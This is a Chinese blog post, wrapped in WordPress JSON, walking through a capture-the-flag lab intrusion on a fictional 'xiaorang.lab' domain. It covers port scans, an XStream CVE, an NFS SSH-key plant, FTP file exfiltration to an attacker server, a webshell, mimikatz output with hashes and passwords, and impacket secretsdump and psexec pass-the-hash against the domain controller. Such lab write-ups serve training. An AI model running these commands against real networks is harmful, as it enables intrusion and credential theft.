{"id":252,"date":"2023-07-19T15:49:31","date_gmt":"2023-07-19T07:49:31","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=252"},"modified":"2023-07-19T15:49:31","modified_gmt":"2023-07-19T07:49:31","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95-delivery","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/252","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u9776\u573a\u8bb0\u5f55-Delivery"},"content":{"rendered":"
\n

\u53c8\u6c2a\u91d1\u4e86\uff0c\u8981\u6ca1\u94b1\u4e86<\/p>\n<\/blockquote>\n

\u5165\u53e3<\/p>\n

\"\"<\/p>\n

80\u5c45\u7136\u6ca1\u4e1c\u897f\uff0c\u5148\u626b\u5168\u7aef\u53e3<\/p>\n

start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 39.99.135.82    is alive\n[*] Icmp alive hosts len is: 1\n39.99.135.82:22 open\n39.99.135.82:80 open\n39.99.135.82:21 open\n39.99.135.82:8080 open\n[*] alive ports len is: 4\nstart vulscan\n[*] WebTitle: http:\/\/39.99.135.82       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n[*] WebTitle: http:\/\/39.99.135.82:8080  code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355\n[+] ftp:\/\/39.99.135.82:21:anonymous \n   [->]1.txt\n   [->]pom.xml<\/code><\/pre>\n
8080\u4e0d\u77e5\u9053\u662f\u4e2a\u4ec0\u4e48\u4e1c\u897f\uff0cftp\u6709\u533f\u540d\u767b\u9646\uff0c\u91cc\u9762\u4e24\u4e2a\u6587\u4ef6\uff0c1.txt\u91cc\u5565\u4e5f\u6ca1\u6709\uff0cpom.xml<\/p>\n
\u770b\u770bpom.xml\u91cc\u7684\u5185\u5bb9\uff0c\u518d\u7ed3\u5408hint\uff0c\u6ce8\u610f\u5230\u8fd9\u4e00\u6761<\/p>\n
        <dependency>\n            <groupId>com.thoughtworks.xstream<\/groupId>\n            <artifactId>xstream<\/artifactId>\n            <version>1.4.16<\/version>\n        <\/dependency><\/code><\/pre>\n
\u7acb\u523b\u53bb\u627e\u6d1e<\/p>\n
\u627e\u5230\u4e86\uff0cCVE-2021-29505\uff0c\u8fd9\u7bc7\u6587\u7ae0<\/a>\u8bb2\u7684\u4e0d\u9519\uff0c\u76f4\u63a5\u7167\u7740\u5229\u7528\u5c31\u597d\u4e86\uff0c\u6210\u529f\u62ff\u5230root\u7684shell\uff0cflag1\u5230\u624b<\/p>\n
\"\"<\/p>\n
\u7136\u540e\u505a\u4ee3\u7406\u52a0\u626b\u5185\u7f51<\/p>\n
start infoscan\n(icmp) Target 172.22.13.14    is alive\n(icmp) Target 172.22.13.6     is alive\n(icmp) Target 172.22.13.28    is alive\n(icmp) Target 172.22.13.57    is alive\n[*] Icmp alive hosts len is: 4\n172.22.13.28:445 open\n172.22.13.6:445 open\n172.22.13.28:139 open\n172.22.13.6:139 open\n172.22.13.28:135 open\n172.22.13.6:135 open\n172.22.13.57:80 open\n172.22.13.28:80 open\n172.22.13.57:22 open\n172.22.13.14:80 open\n172.22.13.14:22 open\n172.22.13.14:21 open\n172.22.13.14:8080 open\n172.22.13.28:8000 open\n172.22.13.6:88 open\n172.22.13.28:3306 open\n[*] alive ports len is: 16\nstart vulscan\n[*] NetInfo:\n[*]172.22.13.28\n   [->]WIN-HAUWOLAO\n   [->]172.22.13.28\n[*] NetBios: 172.22.13.6     [+]DC XIAORANG\\WIN-DC          \n[*] NetInfo:\n[*]172.22.13.6\n   [->]WIN-DC\n   [->]172.22.13.6\n[*] WebTitle: http:\/\/172.22.13.28       code:200 len:2525   title:\u6b22\u8fce\u767b\u5f55OA\u529e\u516c\u5e73\u53f0\n[*] WebTitle: http:\/\/172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n[+] ftp:\/\/172.22.13.14:21:anonymous \n   [->]1.txt\n   [->]pom.xml\n[*] WebTitle: http:\/\/172.22.13.14:8080  code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355\n[*] WebTitle: http:\/\/172.22.13.57       code:200 len:4833   title:Welcome to CentOS\n[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 \n[*] WebTitle: http:\/\/172.22.13.28:8000  code:200 len:170    title:Nothing Here.\n[+] mysql:172.22.13.28:3306:root 123456<\/code><\/pre>\n
\u56db\u53f0\u673a\u5668<\/p>\n
172.22.13.14    \u62ff\u4e0b\n172.22.13.6     \u57df\u63a7\n172.22.13.28    OA\n172.22.13.57    <\/code><\/pre>\n
\u6839\u636e\u63d0\u793a\u8bf4\u6709\u4e00\u4e2aNFS\u5728\u91cc\u9762\uff0c\u90a3\u4e2acentos\u4e0d\u77e5\u9053\u662f\u5e72\u561b\u7684\u4f30\u8ba1\u5c31\u662fNFS\u670d\u52a1\u4e86\uff0c\u8bd5\u8bd5<\/p>\n
\u4e00\u773c\u4e01\u771f\u4e86\u3002\u5c31\u662f<\/p>\n
\"\"<\/p>\n
\u8fd9\u91cc\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48mac\u6b7b\u6d3bshowmount\u4e0d\u51fa\u6765\uff0c\u6362\u4e86linux<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u627e\u5230\uff0c\u6302\u8f7d\u5c31\u884c<\/p>\n
mkdir temp\nmount -t nfs 172.22.13.57:\/home\/joyce .\/temp -o nolock<\/code><\/pre>\n
\u4e00\u773c\u4e01\u771f\uff0c\u76f4\u63a5\u5728\u91cc\u9762\u65b0\u5efa.ssh\u6587\u4ef6\u5939\u518d\u5f80\u91cc\u9762\u5199ssh\u516c\u94a5<\/p>\n
ssh\u767b\u9646\u6210\u529f<\/p>\n
\"\"<\/p>\n
\u7ec8\u7aef\u91cc\u6709\u70b9\u5361\uff0c\u505a\u4e00\u4e0b\u7aef\u53e3\u8f6c\u53d1\u4e4b\u540e\u4e0a\u7ebf\u5230viper<\/p>\n
linpeas\u626b\u4e00\u624b\uff0c\u53d1\u73b0\u4e86\u8fd9\u4e2a<\/p>\n
\/home\/joyce *(rw,sync,insecure,no_root_squash) <\/code><\/pre>\n
\u751a\u81f3ftp\u8fd8\u6709suid\u6743\u9650<\/p>\n
\u4e00\u773c\u63d0\u6743\uff0c\u5f00\u63d0<\/p>\n
\u5f80\u91cc\u9762\u4f20\u4e86suid\u7684bash\u6b7b\u6d3b\u6267\u884c\u4e0d\u4e86\uff0c\u540e\u6765\u53d1\u73b0\u6211\u73b0\u5728\u6362\u4e86mac\u4e4b\u540e\u5df2\u7ecf\u4e0d\u80fd\u8fd9\u6837\u505a\u4e86\uff0c\u67b6\u6784\u4e0d\u4e00\u6837\uff0c\u4ee4\u4eba\u611f\u53f9<\/p>\n
\u540e\u6765\u6709\u6362\u4e86\u53f0\u7535\u8111\u53d1\u73b0\u8fd9\u6761\u8def\u4f3c\u4e4e\u662f\u8d70\u4e0d\u901a\u7684\uff0c\u611f\u53f9\uff0c\u8fd8\u662f\u770b\u770bftp\u5427<\/p>\n
\u6839\u76ee\u5f55\u91cc\u8fd8\u6709\u4e00\u4e2apAss.txt\u548cflag02.txt\uff0cpAss\u53ef\u4ee5\u76f4\u63a5\u770b<\/p>\n
xiaorang.lab\/zhangwen\\QT62f3gBhK1<\/code><\/pre>\n
\u5373\u7136ftp\u6709suid\u6743\u9650\uff0c\u90a3\u5c31\u53ef\u4ee5\u7528ftp\u628aflag2\u4f20\u5230\u5916\u7f51\u7684\u90a3\u53f0\u673a\u5668\uff0c\u4f46\u662f\u90a3\u53f0\u673a\u5668\u4e0a\u7684ftp\u670d\u52a1\u662f\u4e0d\u80fd\u5199\u5165\u6587\u4ef6\u7684\uff0c\u5f97\u81ea\u5df1\u8d77\u4e00\u4e2a<\/p>\n
python3 -m pyftpdlib -p 2335 -u zzz -P zzz -w<\/code><\/pre>\n
\u76f4\u63a5put \/flag02.txt\u5c31\u884c<\/p>\n
\"\"<\/p>\n
\u8fd8\u7ed9\u4e86\u4e2ahint\u662frelay race\uff0c\u4e0d\u662f\u5f88\u61c2<\/p>\n
\u9664\u4e86\u57df\u63a7\u8fd8\u5269\u4e00\u53f0windows\uff0c\u800c\u4e14\u5f00\u4e863389\uff0c\u4f30\u8ba1\u662f\u53ef\u4ee5\u76f4\u63a5rdp\u4e0a\u53bb<\/p>\n
\u53d1\u73b0\u767b\u4e0d\u4e0a\uff0c\u8bd5\u4e86\u4e00\u901a\u6700\u540e\u627e\u5230\u8fd9\u4e2a\u7528\u6237\u53ef\u4ee5\u62ff\u6765\u770bsmb\u670d\u52a1<\/p>\n
p4 smbmap -d xiaorang.lab -u zhangwen -p QT62f3gBhK1 -H 172.22.13.28<\/code><\/pre>\n
\u4f46\u662f\u91cc\u9762\u4e5f\u6ca1\u6709\u4ec0\u4e48\u4e1c\u897f<\/p>\n
\u7136\u540e\u5c31\u662f\u5f88\u5947\u602a\uff0cmac\u4e0a\u7684\u5fae\u8f6frdp\u8fde\u4e0d\u4e0a\uff0c\u6362linux\u91cc\u7684remmina\u5c31\u8fde\u4e0a\u4e86\uff0c\u6211\u4e0d\u597d\u8bf4<\/p>\n
\"\"<\/p>\n
\u53ef\u4ee5\u770b\u5230\u684c\u9762\u4e0a\u4e00\u4e2aphpstudy<\/p>\n
\u76f4\u63a5\u627e\u5230\u5730\u5740\u5728C:\\phpstudy_pro\\WWW<\/p>\n
\u624b\u52a8\u5f80\u91cc\u9762\u5199\u4e00\u53e5\u8bdd<\/p>\n
\"\"<\/p>\n
\u7136\u540e\u8681\u5251\u8fde\u63a5\uff0c\u5f88\u597d\u7684system<\/p>\n
\u76f4\u63a5\u8bfbflag3<\/p>\n
\"\"<\/p>\n
\u5c45\u7136\u6ca1\u6709\u7528\u5230mysql\u7684\u5f31\u53e3\u4ee4<\/p>\n
\u76f4\u63a5\u4f20mimikatz\u6293\u4e00\u624b\u5bc6\u7801<\/p>\n
mimikatz # privilege::debug\nmimikatz # sekurlsa::logonpasswords<\/code><\/pre>\n
\u6293\u5230\u4e86chenglei\u7684<\/p>\n
Authentication Id : 0 ; 139874 (00000000:00022262)\nSession           : Service from 0\nUser Name         : chenglei\nDomain            : XIAORANG\nLogon Server      : WIN-DC\nLogon Time        : 2023\/7\/19 11:16:36\nSID               : S-1-5-21-3269458654-3569381900-10559451-1105\n        msv :\n         [00000003] Primary\n         * Username : chenglei\n         * Domain   : XIAORANG\n         * NTLM     : 0c00801c30594a1b8eaa889d237c5382\n         * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7\n         * DPAPI    : 89b179dc738db098372c365602b7b0f4\n        tspkg :\n        wdigest :\n         * Username : chenglei\n         * Domain   : XIAORANG\n         * Password : (null)\n        kerberos :\n         * Username : chenglei\n         * Domain   : XIAORANG.LAB\n         * Password : Xt61f3LBhg1\n        ssp :\n        credman <\/code><\/pre>\n
\u76f4\u63a5rdp\u767b\u4e0achenglei\u7684\u53f7\uff0cwhoami \/groups\u4e00\u4e0b<\/p>\n
\u53d1\u73b0chenglei\u5728ACL Admin\u7ec4\u91cc\uff0c\u80fd\u6539ACL\u6743\u9650<\/p>\n
\"\"<\/p>\n
github\u7ffb\u5230\u4e00\u7bc7\u7b14\u8bb0<\/a>\uff0c\u76f4\u63a5\u7167\u505a<\/p>\n
\u8fd9\u91cc\u6211\u8fd9\u8fb9\u5f88\u5947\u602a\uff0c\u76f4\u63a5\u5f00powershell\u4f1a\u63d0\u793a\u627e\u4e0d\u5230Add-DomainObjectAcl\u547d\u4ee4\uff0c\u4ececmd\u91cc\u5f00\u7684powershell\u53c8\u53ef\u4ee5\u4e86\uff0c\u4e0d\u597d\u8bf4<\/p>\n
\u6709\u6743\u9650\u4e86\uff0c\u76f4\u63a5\u628a\u57df\u5185\u7684hash\u5168\u5bfc\u51fa\u6765<\/p>\n
python3 .\/tools\/impacket-0.10.0\/examples\/secretsdump.py xiaorang.lab\/chenglei:Xt61f3LBhg1@172.22.13.6 -just-dc<\/code><\/pre>\n
\"\"<\/p>\n
\u76f4\u63a5\u6a2a\u5411\u8fc7\u53bb\u57df\u63a7\u62ffflag4<\/p>\n
python3 .\/tools\/impacket-0.10.0\/examples\/psexec.py -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6<\/code><\/pre>\n
\"\"<\/p>\n","protected":false},"excerpt":{"rendered":"
\u53c8\u6c2a\u91d1\u4e86\uff0c\u8981\u6ca1\u94b1\u4e86 \u5165\u53e3 80\u5c45\u7136\u6ca1\u4e1c\u897f\uff0c\u5148\u626b\u5168\u7aef\u53e3 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 39.99.135.82 is alive [*] Icmp alive hosts len is: 1 39.99.1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,3],"tags":[],"class_list":["post-252","post","type-post","status-publish","format-standard","hentry","category-wp","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/252","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=252"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/252\/revisions"}],"predecessor-version":[{"id":253,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/252\/revisions\/253"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}